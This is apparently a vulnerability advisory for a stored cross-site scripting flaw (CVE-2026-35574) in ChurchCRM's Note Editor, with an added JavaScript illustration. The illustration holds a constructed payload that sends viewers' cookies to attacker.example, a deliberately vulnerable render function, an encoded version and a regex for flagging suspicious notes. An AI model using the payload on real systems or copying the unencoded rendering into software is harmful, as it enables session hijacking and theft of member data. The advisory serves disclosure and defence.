PT-2026-30920 · ChurchCRM · ChurchCRM
Uartu0 · Published 2026-04-07 · Updated 2026-04-07 · CVE-2026-35574
CVSS v3.1: 8.7 (High)
Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Name of the Vulnerable Software and Affected Versions: ChurchCRM versions prior to 6.5.3
Description: ChurchCRM, an open-source church management system, contains a stored cross-site scripting (XSS) flaw in the Note Editor. Note content is saved and later rendered to other users without adequate output encoding, so an authenticated user who holds the permission to add notes can save a note carrying JavaScript that runs in the browser of every user who subsequently views it, administrators included. Because the script executes with the victim's authenticated session, it can hijack that session, perform administrative actions on the attacker's behalf (privilege escalation), and read sensitive church member data. This matches the CVSS vector: low privileges required (a note-adding account), user interaction required (a victim must open the note), and changed scope (the code acts in the victim's browser and under the victim's rights, not the attacker's).
Recommendations: Update to version 6.5.3 or later. Until the update is applied, limit the note-adding permission to trusted accounts. Because the flaw is stored, also review notes created before the update for unexpected HTML or script markup, since payloads saved earlier may still be present after upgrading.
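The following is an added illustration written for this advisory; it is not ChurchCRM code and does not reflect how the project's Note Editor is implemented. It shows the general shape of the bug class described above: a note body interpolated into HTML verbatim (the stored-XSS sink), the same rendering with context-appropriate output encoding, and a small audit helper of the kind a practitioner might run over existing notes after patching. The `NOTES` array, the `attacker.example` host in the payload and all function names are constructed for the example.

```javascript
// Added example, not ChurchCRM code. NOTES is a constructed in-memory store
// standing in for a notes table; note 2 is a constructed malicious payload.
const NOTES = [
  { id: 1, author: "alice", body: "Visited the Smith family on Tuesday." },
  {
    id: 2,
    author: "mallory",
    // Constructed payload: fires when any viewer's browser renders the note.
    body: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  },
];

// Minimal HTML encoding for text placed between tags or inside a quoted
// attribute value. Same intent as PHP's
// htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8').
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// VULNERABLE: the stored note body is dropped into the page unchanged, so the
// browser of every user who opens the list (administrators included) runs
// whatever script the note author saved.
function renderNoteVulnerable(note) {
  return `<li data-id="${note.id}"><b>${note.author}</b>: ${note.body}</li>`;
}

// HARDENED: every untrusted value is encoded for the HTML context it lands in.
// Markup in the body is displayed as text instead of being parsed.
function renderNoteSafe(note) {
  return `<li data-id="${escapeHtml(note.id)}"><b>${escapeHtml(note.author)}</b>: ${escapeHtml(note.body)}</li>`;
}

// Triage helper for notes that were stored before a fix: flags bodies that
// contain tag syntax, a javascript: URL, or an on*= event handler attribute.
// A heuristic for review, not a sanitiser.
const SUSPICIOUS = /<\s*\/?\s*[a-z!]|javascript:|\bon[a-z]+\s*=/i;
function findSuspiciousNotes(notes) {
  return notes.filter((n) => SUSPICIOUS.test(n.body)).map((n) => n.id);
}

// Stand-alone demonstration.
if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", renderNoteVulnerable(NOTES[1]));
  console.log("hardened:  ", renderNoteSafe(NOTES[1]));
  console.log("notes needing review:", findSuspiciousNotes(NOTES));
}
```

Escaping is the right fix only where the note is meant to be plain text. If a note editor is designed to accept rich text, encoding the whole body would break legitimate formatting, and the safe approach is an allow-list HTML sanitiser that strips tags and attributes outside a small known-good set; the advisory does not say which of the two applies to ChurchCRM's Note Editor.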


Tags: XSS
Related Identifiers: CVE-2026-35574
Affected Products: ChurchCRM